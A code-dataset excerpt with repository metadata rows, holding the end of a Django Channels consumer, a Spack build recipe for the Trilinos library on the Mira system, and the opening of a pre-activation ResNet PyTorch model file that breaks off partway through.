await self.channel_layer.group_send(
self.room_group_name,
{
'type': 'push_question',
'content': question_obj.content,
'questioner': question_obj.questioner,
'likes': question_obj.likes,
}
)
# Receive message from room group
async def push_question(self, event):
await self.send_json(event)
| [
"seloselo1001@gmail.com"
] | seloselo1001@gmail.com |
46d2d07519f75a97e9add74926ea8d86907ad63c | caebb55c3d03a9dad4888a27394733896cf1fd65 | /configs/machines/mira/trilinos/package.py | 76a98f4c3fdd9c1bc6a12c3d87344914c8701aba | [] | no_license | mclarsen/build-test | 70d82e5cf7dcba8868263626ce168aab4df0e35e | 8861bf717335c1afef34967325c5dc3359f5fdb8 | refs/heads/master | 2020-03-19T00:41:20.426014 | 2018-05-29T22:16:12 | 2018-05-29T22:16:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,070 | py | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
import os
import sys
from spack import *
from spack.operating_systems.mac_os import macOS_version
# Trilinos is complicated to build, as an inspiration a couple of links to
# other repositories which build it:
# https://github.com/hpcugent/easybuild-easyblocks/blob/master/easybuild/easyblocks/t/trilinos.py#L111
# https://github.com/koecher/candi/blob/master/deal.II-toolchain/packages/trilinos.package
# https://gitlab.com/configurations/cluster-config/blob/master/trilinos.sh
# https://github.com/Homebrew/homebrew-science/blob/master/trilinos.rb and some
# relevant documentation/examples:
# https://github.com/trilinos/Trilinos/issues/175
class Trilinos(CMakePackage):
"""The Trilinos Project is an effort to develop algorithms and enabling
technologies within an object-oriented software framework for the solution
of large-scale, complex multi-physics engineering and scientific problems.
A unique design feature of Trilinos is its focus on packages.
"""
homepage = "https://trilinos.org/"
url = "https://github.com/trilinos/Trilinos/archive/trilinos-release-12-12-1.tar.gz"
maintainers = ['aprokop']
# ###################### Versions ##########################
version('xsdk-0.2.0',
git='https://github.com/trilinos/Trilinos.git', tag='xsdk-0.2.0')
version('develop',
git='https://github.com/trilinos/Trilinos.git', tag='develop')
version('master',
git='https://github.com/trilinos/Trilinos.git', tag='master')
version('12.12.1', 'ecd4606fa332212433c98bf950a69cc7')
version('12.10.1', '667333dbd7c0f031d47d7c5511fd0810')
version('12.8.1', '9f37f683ee2b427b5540db8a20ed6b15')
version('12.6.4', 'e11fff717d0e4565779f75a47feecbb2')
version('12.6.3', '9ce30b6ab956bfc41730479a9ef05d05')
version('12.6.2', '0237d32feedd979a6fbb139aa5df8500')
version('12.6.1', '14ab8f7e74b66c33d5731cbf68b8cb82')
version('12.4.2', '98880f414752220e60feaeb36b023f60')
version('12.2.1', '8b344a9e9e533126dfd96db58ce69dde')
version('12.0.1', 'b8263f7037f7c688091d0da19d169709')
version('11.14.3', 'ff31ad49d633ab28369c228784055c85')
version('11.14.2', '1fdf15a5b4494f832b414f9c447ab685')
version('11.14.1', '478d0438d935294a7c94347c94a7c8cb')
# ###################### Variants ##########################
# Other
# not everyone has py-numpy activated, keep it disabled by default to avoid
# configure errors
variant('python', default=False,
description='Build python wrappers')
# Build options
variant('fortran', default=True,
description='Compile with Fortran support')
variant('instantiate', default=True,
description='Compile with explicit instantiation')
variant('instantiate_cmplx', default=False,
description='Compile with explicit instantiation for complex')
variant('openmp', default=False,
description='Enable OpenMP')
variant('shared', default=True,
description='Enables the build of shared libraries')
variant('xsdkflags', default=False,
description='Compile using the default xSDK configuration')
# TPLs (alphabet order)
variant('boost', default=True,
description='Compile with Boost')
variant('cgns', default=False,
description='Enable CGNS')
variant('exodus', default=True,
description='Compile with Exodus from SEACAS')
variant('gtest', default=True,
description='Compile with Gtest')
variant('hdf5', default=True,
description='Compile with HDF5')
variant('hypre', default=True,
description='Compile with Hypre preconditioner')
variant('metis', default=True,
description='Compile with METIS and ParMETIS')
variant('mumps', default=True,
description='Compile with support for MUMPS solvers')
variant('pnetcdf', default=False,
description='Compile with parallel-netcdf')
variant('suite-sparse', default=True,
description='Compile with SuiteSparse solvers')
variant('superlu-dist', default=True,
description='Compile with SuperluDist solvers')
variant('superlu', default=False,
description='Compile with SuperLU solvers')
variant('x11', default=False,
description='Compile with X11')
variant('zlib', default=False,
description='Compile with zlib')
# Package options (alphabet order)
variant('alloptpkgs', default=False,
description='Compile with all optional packages')
variant('amesos', default=True,
description='Compile with Amesos')
variant('amesos2', default=True,
description='Compile with Amesos2')
variant('anasazi', default=True,
description='Compile with Anasazi')
variant('aztec', default=True,
description='Compile with Aztec')
variant('belos', default=True,
description='Compile with Belos')
variant('epetra', default=True,
description='Compile with Epetra')
variant('epetraext', default=True,
description='Compile with EpetraExt')
variant('ifpack', default=True,
description='Compile with Ifpack')
variant('ifpack2', default=True,
description='Compile with Ifpack2')
variant('intrepid', default=False,
description='Enable Intrepid')
variant('intrepid2', default=False,
description='Enable Intrepid2')
variant('kokkos', default=True,
description='Compile with Kokkos')
variant('ml', default=True,
description='Compile with ML')
variant('muelu', default=True,
description='Compile with Muelu')
variant('nox', default=False,
description='Enable NOX')
variant('rol', default=False,
description='Enable ROL')
variant('sacado', default=True,
description='Compile with Sacado')
variant('stk', default=False,
description='Compile with STK')
variant('shards', default=False,
description='Enable Shards')
variant('teuchos', default=True,
description='Compile with Teuchos')
variant('tpetra', default=True,
description='Compile with Tpetra')
variant('zoltan', default=True,
description='Compile with Zoltan')
variant('zoltan2', default=True,
description='Compile with Zoltan2')
# External package options
variant('dtk', default=False,
description='Enable DataTransferKit')
variant('fortrilinos', default=False,
description='Enable ForTrilinos')
resource(name='dtk',
git='https://github.com/ornl-cees/DataTransferKit',
tag='master',
placement='DataTransferKit',
when='+dtk')
resource(name='fortrilinos',
git='https://github.com/trilinos/ForTrilinos',
tag='develop',
placement='packages/ForTrilinos',
when='+fortrilinos')
conflicts('+tpetra', when='~kokkos')
conflicts('+intrepid2', when='~kokkos')
conflicts('+amesos2', when='~tpetra')
conflicts('+ifpack2', when='~tpetra')
conflicts('+zoltan2', when='~tpetra')
conflicts('+dtk', when='~tpetra')
conflicts('+fortrilinos', when='~fortran')
conflicts('+fortrilinos', when='@:99')
conflicts('+fortrilinos', when='@master')
# Can only use one type of SuperLU
conflicts('+superlu-dist', when='+superlu')
# For Trilinos v11 we need to force SuperLUDist=OFF, since only the
# deprecated SuperLUDist v3.3 together with an Amesos patch is working.
conflicts('+superlu-dist', when='@11.4.1:11.14.3')
# PnetCDF was only added after v12.10.1
conflicts('+pnetcdf', when='@0:12.10.1')
# ###################### Dependencies ##########################
# Everything should be compiled position independent (-fpic)
depends_on('blas')
depends_on('lapack')
depends_on('boost', when='+boost')
depends_on('boost', when='+dtk')
depends_on('matio')
depends_on('glm')
depends_on('metis@5:', when='+metis')
depends_on('suite-sparse', when='+suite-sparse')
depends_on('zlib', when="+zlib")
# MPI related dependencies
depends_on('mpi')
depends_on('netcdf+mpi+parallel-netcdf')
depends_on('parallel-netcdf')
depends_on('parmetis', when='+metis')
depends_on('cgns', when='+cgns')
# Trilinos' Tribits config system is limited which makes it very tricky to
# link Amesos with static MUMPS, see
# https://trilinos.org/docs/dev/packages/amesos2/doc/html/classAmesos2_1_1MUMPS.html
# One could work it out by getting linking flags from mpif90 --showme:link
# (or alike) and adding results to -DTrilinos_EXTRA_LINK_FLAGS together
# with Blas and Lapack and ScaLAPACK and Blacs and -lgfortran and it may
# work at the end. But let's avoid all this by simply using shared libs
depends_on('mumps@5.0:+mpi+shared', when='+mumps')
depends_on('scalapack', when='+mumps')
depends_on('superlu-dist', when='+superlu-dist')
depends_on('superlu-dist@:4.3', when='@:12.6.1+superlu-dist')
depends_on('superlu-dist@develop', when='@develop+superlu-dist')
depends_on('superlu-dist@xsdk-0.2.0', when='@xsdk-0.2.0+superlu-dist')
depends_on('superlu+pic@4.3', when='+superlu')
# Trilinos can not be built against 64bit int hypre
depends_on('hypre~internal-superlu~int64', when='+hypre')
depends_on('hypre@xsdk-0.2.0~internal-superlu', when='@xsdk-0.2.0+hypre')
depends_on('hypre@develop~internal-superlu', when='@develop+hypre')
# FIXME: concretizer bug? 'hl' req by netcdf is affecting this code.
depends_on('hdf5+hl+mpi', when='+hdf5')
depends_on('python', when='+python')
depends_on('py-numpy', when='+python', type=('build', 'run'))
depends_on('swig', when='+python')
patch('umfpack_from_suitesparse.patch', when='@11.14.1:12.8.1')
patch('xlf_seacas.patch', when='@12.10.1:%xl')
patch('xlf_seacas.patch', when='@12.10.1:%xl_r')
patch('xlf_tpetra.patch', when='@12.12.1:%xl')
patch('xlf_tpetra.patch', when='@12.12.1:%xl_r')
def url_for_version(self, version):
url = "https://github.com/trilinos/Trilinos/archive/trilinos-release-{0}.tar.gz"
return url.format(version.dashed)
def cmake_args(self):
spec = self.spec
cxx_flags = []
options = []
# #################### Base Settings #######################
mpi_bin = spec['mpi'].prefix.bin
options.extend([
'-DTrilinos_VERBOSE_CONFIGURE:BOOL=OFF',
'-DTrilinos_ENABLE_TESTS:BOOL=OFF',
'-DTrilinos_ENABLE_EXAMPLES:BOOL=OFF',
'-DTrilinos_ENABLE_CXX11:BOOL=ON',
'-DBUILD_SHARED_LIBS:BOOL=%s' % (
'ON' if '+shared' in spec else 'OFF'),
'-DTrilinos_EXTRA_LINK_FLAGS:STRING=-L/soft/libraries/hdf5/1.8.17/cnk-gcc/current/lib -Wl,-Bstatic -lhdf5 -L/soft/libraries/alcf/current/gcc/ZLIB/lib -Wl,-Bstatic -lz -L/soft/compilers/gcc/4.8.4/powerpc64-bgq-linux/lib -Wl,-Bstatic -ldl',
#'-DTrilinos_EXTRA_LINK_FLAGS:STRING=-L/soft/libraries/alcf/current/gcc/LAPACK/lib -Wl,-Bstatic -llapack -L/soft/libraries/alcf/current/gcc/BLAS/lib -Wl,-Bstatic -lblas -L/soft/libraries/hdf5/1.8.17/cnk-gcc/current/lib -Wl,-Bstatic -lhdf5 -L/soft/libraries/alcf/current/gcc/ZLIB/lib -Wl,-Bstatic -lz -L/soft/compilers/gcc/4.8.4/powerpc64-bgq-linux/lib -Wl,--no-as-needed -Wl,-Bstatic -ldl -static-libgfortran -Wl,--allow-multiple-definition',
'-DCMAKE_BUILD_WITH_INSTALL_RPATH:BOOL=TRUE',
# The following can cause problems on systems that don't have
# static libraries available for things like dl and pthreads
# for example when trying to build static libs
'-DTPL_FIND_SHARED_LIBS:BOOL=%s' % (
'ON' if '+shared' in spec else 'OFF'),
'-DTrilinos_LINK_SEARCH_START_STATIC:BOOL=%s' % (
'OFF' if '+shared' in spec else 'ON'),
# The following can cause problems on systems that don't have
# static libraries available for things like dl and pthreads
# for example when trying to build static libs
# '-DTPL_FIND_SHARED_LIBS:BOOL=%s' % (
# 'ON' if '+shared' in spec else 'OFF'),
# '-DTrilinos_LINK_SEARCH_START_STATIC:BOOL=%s' % (
# 'OFF' if '+shared' in spec else 'ON'),
# Force Trilinos to use the MPI wrappers instead of raw compilers
# this is needed on Apple systems that require full resolution of
# all symbols when linking shared libraries
'-DTPL_ENABLE_MPI:BOOL=ON',
'-DCMAKE_C_COMPILER=%s' % spec['mpi'].mpicc,
'-DCMAKE_CXX_COMPILER=%s' % spec['mpi'].mpicxx,
'-DCMAKE_Fortran_COMPILER=%s' % spec['mpi'].mpifc,
'-DMPI_BASE_DIR:PATH=%s' % spec['mpi'].prefix
])
# ################## Trilinos Packages #####################
options.extend([
'-DTrilinos_ENABLE_ALL_OPTIONAL_PACKAGES:BOOL=%s' % (
'ON' if '+alloptpkgs' in spec else 'OFF'),
'-DTrilinos_ENABLE_Amesos:BOOL=%s' % (
'ON' if '+amesos' in spec else 'OFF'),
'-DTrilinos_ENABLE_Amesos2:BOOL=%s' % (
'ON' if '+amesos2' in spec else 'OFF'),
'-DTrilinos_ENABLE_Anasazi:BOOL=%s' % (
'ON' if '+anasazi' in spec else 'OFF'),
'-DTrilinos_ENABLE_AztecOO:BOOL=%s' % (
'ON' if '+aztec' in spec else 'OFF'),
'-DTrilinos_ENABLE_Belos:BOOL=%s' % (
'ON' if '+belos' in spec else 'OFF'),
'-DTrilinos_ENABLE_Epetra:BOOL=%s' % (
'ON' if '+epetra' in spec else 'OFF'),
'-DTrilinos_ENABLE_EpetraExt:BOOL=%s' % (
'ON' if '+epetraext' in spec else 'OFF'),
'-DTrilinos_ENABLE_Ifpack:BOOL=%s' % (
'ON' if '+ifpack' in spec else 'OFF'),
'-DTrilinos_ENABLE_Ifpack2:BOOL=%s' % (
'ON' if '+ifpack2' in spec else 'OFF'),
'-DTrilinos_ENABLE_Intrepid=%s' % (
'ON' if '+intrepid' in spec else 'OFF'),
'-DTrilinos_ENABLE_Intrepid2=%s' % (
'ON' if '+intrepid2' in spec else 'OFF'),
'-DTrilinos_ENABLE_Kokkos:BOOL=%s' % (
'ON' if '+kokkos' in spec else 'OFF'),
'-DTrilinos_ENABLE_ML:BOOL=%s' % (
'ON' if '+ml' in spec else 'OFF'),
'-DTrilinos_ENABLE_MueLu:BOOL=%s' % (
'ON' if '+muelu' in spec else 'OFF'),
'-DTrilinos_ENABLE_NOX:BOOL=%s' % (
'ON' if '+nox' in spec else 'OFF'),
'-DTrilinos_ENABLE_PyTrilinos:BOOL=%s' % (
'ON' if '+python' in spec else 'OFF'),
'-DTrilinos_ENABLE_ROL:BOOL=%s' % (
'ON' if '+rol' in spec else 'OFF'),
'-DTrilinos_ENABLE_Sacado:BOOL=%s' % (
'ON' if '+sacado' in spec else 'OFF'),
'-DTrilinos_ENABLE_Shards=%s' % (
'ON' if '+shards' in spec else 'OFF'),
'-DTrilinos_ENABLE_Teuchos:BOOL=%s' % (
'ON' if '+teuchos' in spec else 'OFF'),
'-DTrilinos_ENABLE_Tpetra:BOOL=%s' % (
'ON' if '+tpetra' in spec else 'OFF'),
'-DTrilinos_ENABLE_Zoltan:BOOL=%s' % (
'ON' if '+zoltan' in spec else 'OFF'),
'-DTrilinos_ENABLE_Zoltan2:BOOL=%s' % (
'ON' if '+zoltan2' in spec else 'OFF'),
])
if '+xsdkflags' in spec:
options.extend(['-DUSE_XSDK_DEFAULTS=YES'])
if '+stk' in spec:
# Currently these are fairly specific to the Nalu package
# They can likely change when necessary in the future
options.extend([
'-DTrilinos_ENABLE_STKMesh:BOOL=ON',
'-DTrilinos_ENABLE_STKSimd:BOOL=ON',
'-DTrilinos_ENABLE_STKIO:BOOL=ON',
'-DTrilinos_ENABLE_STKTransfer:BOOL=ON',
'-DTrilinos_ENABLE_STKSearch:BOOL=ON',
'-DTrilinos_ENABLE_STKUtil:BOOL=ON',
'-DTrilinos_ENABLE_STKTopology:BOOL=ON',
'-DTrilinos_ENABLE_STKUnit_tests:BOOL=ON',
'-DTrilinos_ENABLE_STKUnit_test_utils:BOOL=ON',
'-DTrilinos_ENABLE_STKClassic:BOOL=OFF',
'-DTrilinos_ENABLE_STKExprEval:BOOL=ON'
])
if '+dtk' in spec:
options.extend([
'-DTrilinos_EXTRA_REPOSITORIES:STRING=DataTransferKit',
'-DTpetra_INST_INT_UNSIGNED_LONG:BOOL=ON',
'-DTrilinos_ENABLE_DataTransferKit:BOOL=ON'
])
if '+exodus' in spec:
# Currently these are fairly specific to the Nalu package
# They can likely change when necessary in the future
options.extend([
'-DTrilinos_ENABLE_SEACAS:BOOL=ON',
'-DTrilinos_ENABLE_SEACASExodus:BOOL=ON',
'-DTrilinos_ENABLE_SEACASEpu:BOOL=ON',
'-DTrilinos_ENABLE_SEACASExodiff:BOOL=ON',
'-DTrilinos_ENABLE_SEACASNemspread:BOOL=ON',
'-DTrilinos_ENABLE_SEACASNemslice:BOOL=ON',
'-DTrilinos_ENABLE_SEACASIoss:BOOL=ON'
])
else:
options.extend([
'-DTrilinos_ENABLE_SEACAS:BOOL=OFF',
'-DTrilinos_ENABLE_SEACASExodus:BOOL=OFF'
])
# ######################### TPLs #############################
blas = spec['blas'].libs
lapack = spec['lapack'].libs
# Note: -DXYZ_LIBRARY_NAMES= needs semicolon separated list of names
options.extend([
'-DTPL_ENABLE_BLAS=ON',
'-DBLAS_LIBRARY_NAMES=%s' % ';'.join(blas.names),
'-DBLAS_LIBRARY_DIRS=%s' % ';'.join(blas.directories),
'-DTPL_ENABLE_LAPACK=ON',
'-DLAPACK_LIBRARY_NAMES=%s' % ';'.join(lapack.names),
'-DLAPACK_LIBRARY_DIRS=%s' % ';'.join(lapack.directories),
'-DTPL_ENABLE_Netcdf:BOOL=ON',
'-DNetCDF_ROOT:PATH=%s' % spec['netcdf'].prefix,
'-DTPL_ENABLE_X11:BOOL=%s' % (
'ON' if '+x11' in spec else 'OFF'),
'-DTrilinos_ENABLE_Gtest:BOOL=%s' % (
'ON' if '+gtest' in spec else 'OFF'),
])
if '+hypre' in spec:
options.extend([
'-DTPL_ENABLE_HYPRE:BOOL=ON',
'-DHYPRE_INCLUDE_DIRS:PATH=%s' % spec['hypre'].prefix.include,
'-DHYPRE_LIBRARY_DIRS:PATH=%s' % spec['hypre'].prefix.lib
])
if '+boost' in spec:
options.extend([
'-DTPL_ENABLE_Boost:BOOL=ON',
'-DBoost_INCLUDE_DIRS:PATH=%s' % spec['boost'].prefix.include,
'-DBoost_LIBRARY_DIRS:PATH=%s' % spec['boost'].prefix.lib
])
else:
options.extend(['-DTPL_ENABLE_Boost:BOOL=OFF'])
if '+hdf5' in spec:
options.extend([
'-DTPL_ENABLE_HDF5:BOOL=ON',
'-DHDF5_INCLUDE_DIRS:PATH=%s' % spec['hdf5'].prefix.include,
'-DHDF5_LIBRARY_DIRS:PATH=%s' % spec['hdf5'].prefix.lib
])
else:
options.extend(['-DTPL_ENABLE_HDF5:BOOL=OFF'])
if '+suite-sparse' in spec:
options.extend([
# FIXME: Trilinos seems to be looking for static libs only,
# patch CMake TPL file?
'-DTPL_ENABLE_Cholmod:BOOL=OFF',
# '-DTPL_ENABLE_Cholmod:BOOL=ON',
# '-DCholmod_LIBRARY_DIRS:PATH=%s' % (
# spec['suite-sparse'].prefix.lib,
# '-DCholmod_INCLUDE_DIRS:PATH=%s' % (
# spec['suite-sparse'].prefix.include,
'-DTPL_ENABLE_UMFPACK:BOOL=ON',
'-DUMFPACK_LIBRARY_DIRS:PATH=%s' % (
spec['suite-sparse'].prefix.lib),
'-DUMFPACK_INCLUDE_DIRS:PATH=%s' % (
spec['suite-sparse'].prefix.include),
'-DUMFPACK_LIBRARY_NAMES=umfpack;amd;colamd;cholmod;' +
'suitesparseconfig'
])
else:
options.extend([
'-DTPL_ENABLE_Cholmod:BOOL=OFF',
'-DTPL_ENABLE_UMFPACK:BOOL=OFF',
])
if '+metis' in spec:
options.extend([
'-DTPL_ENABLE_METIS:BOOL=ON',
'-DMETIS_LIBRARY_DIRS=%s' % spec['metis'].prefix.lib,
'-DMETIS_LIBRARY_NAMES=metis',
'-DTPL_METIS_INCLUDE_DIRS=%s' % spec['metis'].prefix.include,
'-DTPL_ENABLE_ParMETIS:BOOL=ON',
'-DParMETIS_LIBRARY_DIRS=%s;%s' % (
spec['parmetis'].prefix.lib, spec['metis'].prefix.lib),
'-DParMETIS_LIBRARY_NAMES=parmetis;metis',
'-DTPL_ParMETIS_INCLUDE_DIRS=%s;%s' % (
spec['parmetis'].prefix.include,
spec['metis'].prefix.include)
])
else:
options.extend([
'-DTPL_ENABLE_METIS:BOOL=OFF',
'-DTPL_ENABLE_ParMETIS:BOOL=OFF',
])
if '+mumps' in spec:
scalapack = spec['scalapack'].libs
options.extend([
'-DTPL_ENABLE_MUMPS:BOOL=ON',
'-DMUMPS_LIBRARY_DIRS=%s' % spec['mumps'].prefix.lib,
# order is important!
'-DMUMPS_LIBRARY_NAMES=dmumps;mumps_common;pord',
'-DTPL_ENABLE_SCALAPACK:BOOL=ON',
'-DSCALAPACK_LIBRARY_NAMES=%s' % ';'.join(scalapack.names),
'-DSCALAPACK_LIBRARY_DIRS=%s' % ';'.join(scalapack.directories)
])
# see
# https://github.com/trilinos/Trilinos/blob/master/packages/amesos/README-MUMPS
cxx_flags.extend([
'-DMUMPS_5_0'
])
else:
options.extend([
'-DTPL_ENABLE_MUMPS:BOOL=OFF',
'-DTPL_ENABLE_SCALAPACK:BOOL=OFF',
])
if '+superlu-dist' in spec:
# Amesos, conflicting types of double and complex SLU_D
# see
# https://trilinos.org/pipermail/trilinos-users/2015-March/004731.html
# and
# https://trilinos.org/pipermail/trilinos-users/2015-March/004802.html
options.extend([
'-DTeuchos_ENABLE_COMPLEX:BOOL=OFF',
'-DKokkosTSQR_ENABLE_Complex:BOOL=OFF'
])
options.extend([
'-DTPL_ENABLE_SuperLUDist:BOOL=ON',
'-DSuperLUDist_LIBRARY_DIRS=%s' %
spec['superlu-dist'].prefix.lib,
'-DSuperLUDist_INCLUDE_DIRS=%s' %
spec['superlu-dist'].prefix.include
])
if spec.satisfies('^superlu-dist@4.0:'):
options.extend([
'-DHAVE_SUPERLUDIST_LUSTRUCTINIT_2ARG:BOOL=ON'
])
else:
options.extend([
'-DTPL_ENABLE_SuperLUDist:BOOL=OFF',
])
if '+superlu' in spec:
options.extend([
'-DTPL_ENABLE_SuperLU:BOOL=ON',
'-DSuperLU_LIBRARY_DIRS=%s' %
spec['superlu'].prefix.lib,
'-DSuperLU_INCLUDE_DIRS=%s' %
spec['superlu'].prefix.include
])
else:
options.extend([
'-DTPL_ENABLE_SuperLU:BOOL=OFF',
])
if '+pnetcdf' in spec:
options.extend([
'-DTPL_ENABLE_Pnetcdf:BOOL=ON',
'-DTPL_Netcdf_Enables_Netcdf4:BOOL=ON',
'-DTPL_Netcdf_PARALLEL:BOOL=ON',
'-DPNetCDF_ROOT:PATH=%s' % spec['parallel-netcdf'].prefix
])
else:
options.extend([
'-DTPL_ENABLE_Pnetcdf:BOOL=OFF'
])
if '+zlib' in spec:
options.extend([
'-DTPL_ENABLE_Zlib:BOOL=ON',
'-DZlib_ROOT:PATH=%s' % spec['zlib'].prefix,
])
else:
options.extend([
'-DTPL_ENABLE_Zlib:BOOL=OFF'
])
if '+cgns' in spec:
options.extend([
'-DTPL_ENABLE_CGNS:BOOL=ON',
'-DCGNS_INCLUDE_DIRS:PATH=%s' % spec['cgns'].prefix.include,
'-DCGNS_LIBRARY_DIRS:PATH=%s' % spec['cgns'].prefix.lib
])
else:
options.extend([
'-DTPL_ENABLE_GGNS:BOOL=OFF'
])
# ################# Miscellaneous Stuff ######################
# OpenMP
if '+openmp' in spec:
options.extend([
'-DTrilinos_ENABLE_OpenMP:BOOL=ON',
'-DKokkos_ENABLE_OpenMP:BOOL=ON'
])
if '+tpetra' in spec:
options.extend([
'-DTpetra_INST_OPENMP:BOOL=ON'
])
# Fortran lib
if '+fortran' in spec:
if spec.satisfies('%gcc') or spec.satisfies('%clang'):
libgfortran = os.path.dirname(os.popen(
'%s --print-file-name libgfortran.a' %
join_path(mpi_bin, 'mpif90')).read())
options.extend([
'-DTrilinos_EXTRA_LINK_FLAGS:STRING=-L%s/ -lgfortran' % (
libgfortran),
'-DTrilinos_ENABLE_Fortran=ON'
])
# Explicit instantiation
if '+instantiate' in spec:
options.extend([
'-DTrilinos_ENABLE_EXPLICIT_INSTANTIATION:BOOL=ON'
])
if '+tpetra' in spec:
options.extend([
'-DTpetra_INST_DOUBLE:BOOL=ON',
'-DTpetra_INST_INT_LONG:BOOL=ON'
'-DTpetra_INST_COMPLEX_DOUBLE=%s' % (
'ON' if '+instantiate_cmplx' in spec else 'OFF'
)
])
# disable due to compiler / config errors:
if spec.satisfies('%xl') or spec.satisfies('%xl_r'):
options.extend([
'-DTrilinos_ENABLE_Pamgen:BOOL=OFF',
'-DTrilinos_ENABLE_Stokhos:BOOL=OFF'
])
if sys.platform == 'darwin':
options.extend([
'-DTrilinos_ENABLE_FEI=OFF'
])
if sys.platform == 'darwin' and macOS_version() >= Version('10.12'):
# use @rpath on Sierra due to limit of dynamic loader
options.append('-DCMAKE_MACOSX_RPATH=ON')
else:
options.append('-DCMAKE_INSTALL_NAME_DIR:PATH=%s' %
self.prefix.lib)
if spec.satisfies('%intel') and spec.satisfies('@12.6.2'):
# Panzer uses some std:chrono that is not recognized by Intel
# Don't know which (maybe all) Trilinos versions this applies to
# Don't know which (maybe all) Intel versions this applies to
options.extend([
'-DTrilinos_ENABLE_Panzer:BOOL=OFF'
])
# collect CXX flags:
options.extend([
'-DCMAKE_CXX_FLAGS:STRING=%s' % (' '.join(cxx_flags)),
])
# disable due to compiler / config errors:
options.extend([
'-DTrilinos_ENABLE_Pike=OFF'
])
return options
@run_after('install')
def filter_python(self):
# When trilinos is built with Python, libpytrilinos is included
# through cmake configure files. Namely, Trilinos_LIBRARIES in
# TrilinosConfig.cmake contains pytrilinos. This leads to a
# run-time error: Symbol not found: _PyBool_Type and prevents
# Trilinos to be used in any C++ code, which links executable
# against the libraries listed in Trilinos_LIBRARIES. See
# https://github.com/Homebrew/homebrew-science/issues/2148#issuecomment-103614509
# A workaround is to remove PyTrilinos from the COMPONENTS_LIST :
if '+python' in self.spec:
filter_file(r'(SET\(COMPONENTS_LIST.*)(PyTrilinos;)(.*)',
(r'\1\3'),
'%s/cmake/Trilinos/TrilinosConfig.cmake' %
self.prefix.lib)
| [
"jon.rood@nrel.gov"
] | jon.rood@nrel.gov |
ce0bb9b7c37fb8d9f44611f1099941fe6efd372c | 4439b04e1fe448b1dffb8239005ca75362926c71 | /models/preresnet.py | 3cbac4fbb217498d61af53aa68c52a579fb229aa | [
"MIT"
] | permissive | yangcyself/SDPoint | 6cd69853fc92989b3f7215a440738f15d44b7618 | f4ae14d6a4126dba96ae5191b1c8f31b5724161a | refs/heads/master | 2020-04-29T03:25:41.066857 | 2019-04-08T10:49:48 | 2019-04-08T10:49:48 | 175,809,324 | 0 | 0 | MIT | 2019-03-15T11:40:07 | 2019-03-15T11:40:06 | null | UTF-8 | Python | false | false | 7,455 | py | import torch.nn as nn
import torch.nn.functional as F
import math
import random
import torch.utils.model_zoo as model_zoo
__all__ = ['PreResNet', 'preresnet18', 'preresnet34', 'preresnet50', 'preresnet101',
'preresnet152', 'preresnet200']
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
global blockID
self.blockID = blockID
blockID += 1
self.downsampling_ratio = 1.
def forward(self, x):
residual = x
out = self.bn1(x)
out_ = self.relu(out)
out = self.conv1(out_)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
if self.downsample is not None:
residual = self.downsample(out_)
out += residual
if self.downsampling_ratio < 1:
out = F.adaptive_avg_pool2d(out, int(round(out.size(2)*self.downsampling_ratio)))
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn1 = nn.BatchNorm2d(inplanes)
self.conv2 = nn.Conv2d(planes, planes, kernel_size=3, stride=stride,
padding=1, bias=False)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = nn.Conv2d(planes, planes * self.expansion, kernel_size=1, bias=False)
self.bn3 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
global blockID
self.blockID = blockID
blockID += 1
self.downsampling_ratio = 1.
def forward(self, x):
residual = x
out = self.bn1(x)
out_ = self.relu(out)
out = self.conv1(out_)
out = self.bn2(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn3(out)
out = self.relu(out)
out = self.conv3(out)
if self.downsample is not None:
residual = self.downsample(out_)
out += residual
if self.downsampling_ratio < 1:
out = F.adaptive_avg_pool2d(out, int(round(out.size(2)*self.downsampling_ratio)))
return out
class PreResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000):
self.inplanes = 64
super(PreResNet, self).__init__()
global blockID
blockID = 0
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.bn2 = nn.BatchNorm2d(512 * block.expansion)
self.avgpool = nn.AdaptiveAvgPool2d(1)
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.blockID = blockID
self.downsampling_ratio = 1.
self.size_after_maxpool = None
for m in self.modules():
if isinstance(m, nn.Conv2d):
n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
